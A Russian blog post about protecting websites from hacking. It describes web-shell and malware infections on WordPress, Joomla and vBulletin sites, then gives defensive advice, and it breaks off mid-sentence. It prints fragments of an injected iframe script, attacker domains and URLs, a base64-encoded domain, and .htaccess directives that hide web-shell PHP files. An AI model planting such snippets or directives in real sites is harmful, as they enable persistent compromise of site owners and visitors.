Как защитить сайт от взлома

Четверг, 16 Янв 2014 20:51

пример веб-шелла WSO

Начало «Уязвимость крылась на хостинге»

На снимке: пример рабочего веб-шелла.

Ну и наконец, самое сладкое на закуску — примеры вредоносного кода, включая образцы рабочих веб-шеллов, используемых при атаке на сайты и изъятых в процессе чистки.

ВАЖНО! Оказывается, антивирус блокирует эту страницу из-за данных образцов вирусного кода. (Кроме того, из-за наличия большого количества вредоносного кода антивирусы, такие как Нод, Авира, AVP, Аваст начали блокировать профильную ветку на форуме поисковых систем серчинжинс). Это естественно, так как на ней содержится реальный код вирусов и троянов. Поэтому я вынужден был скрыть его специальным плагином, в таком случае антивирус не видит его и молчит. Вы можете открыть код, нажав на кнопки соцсетей, но в таком случае нужно будет добавить эту страницу в исключения).

Примеры самых первых вирусов, начинались на

var if8LBdg4 = document.createElement(‘iframe’);if8LBdg4.name = ‘if8LBdg4’;if8LBdg4.src =

где вместо if8LBdg4 используется любой произвольный набор цифр и латинских букв.

Вот еще примеры подобного кода, первый:

Please Like us on Facebook to continue reading.
Tweet

На самом деле таких вариантов очень много, отличаются они цифрами после var — ifKiB9c, ifVcVajd, очевидно присваиваемые рандомно.

Обратите также внимание на названия доменов —

asdep.3inkjet.com

vernum.1ber.to

nulber.ddaapp.com

bazeratincomers.ru и так далее. Тот же абсолютно бессмысленный набор букв, как будто их регистрировал робот.

[original:seo-semki.ru]

Кстати, подобная проблема наблюдалась ранее у сайтов на ЦМС Джумла.

Тогда вирус создавал в корневых папках сайта public_html файлы с цифровым именем и расширением .php (например, 334455.php, 16187.php) размером 2 Кб.

Какие признаки вируса были в тот раз?

В админке Joomla при заходе в общие настройки появлялся белый экран, при этом остальные вкладки работали нормально. Либо появлялись пустые страницы во вкладках пользователи и плагины со ссылкой вида seo-semki.ru/administrator/index.php?option=com_config

Примеры такого кода:

Please Like us on Facebook to continue reading.
Tweet

Скриншот кода:

Please Like us on Facebook to continue reading.
Tweet

В коде были зашифрованы названия доменов:

cnNzbmV3cy53cw== = rssnews.ws

phpfeed.ru

phpsearch.cn

Примеры кода с использованием флешек с эксплойтами внутри:

Please Like us on Facebook to continue reading.
Tweet

Тут зашифрована ссылка на следующий веб-адрес:

http://xatyta.pp.ua/counter/hit/client_de5df061c99066d82cfc437f2b099455

Вот ещё похожий код со ссылкой на этот же домен, только урл уже другой: http://xatyta.pp.ua/crossdomain.xml

Please Like us on Facebook to continue reading.
Tweet

Да, и ещё, бывало, что хакеры защищали свои файлы от любопытных глаз кидая в папки файл .htaccess с таким содержимым:

на движке vbulletin:

Options -MultiViews

ErrorDocument 404 //forums/game/gamedata/fishyv32/500309.php

в папке под сапу:

Options -MultiViews

ErrorDocument 404 //xxxxx.ru/7894fae2a1c4b5dc2e8cc92321s45d67f/123992.php

в папке с кешем линкфида:

Options -MultiViews

ErrorDocument 404 //хэш/1172.php

Как избежать заражения сайта?

 

И наконец, рекомендации на тему «Как избежать заражения сайта и что делать в случае, если взлом всё же произошёл?»

Первое, это, естественно, скачивать файлы и плагины только с официальных источников, например, для Вордпресс это сайт wordpress.org.

Второе – регулярно обновлять файлы движка и плагинов до новой версии. Проверять и скачивать все новые обновления безопасности (патчи), закрывающие найденные уязвимости, что особенно актуально для сообщества Dle.

Третье. Следует проверять данные, которые могут вводить пользователи. Следует также исключить возможность вставки JavaScript-ов внутри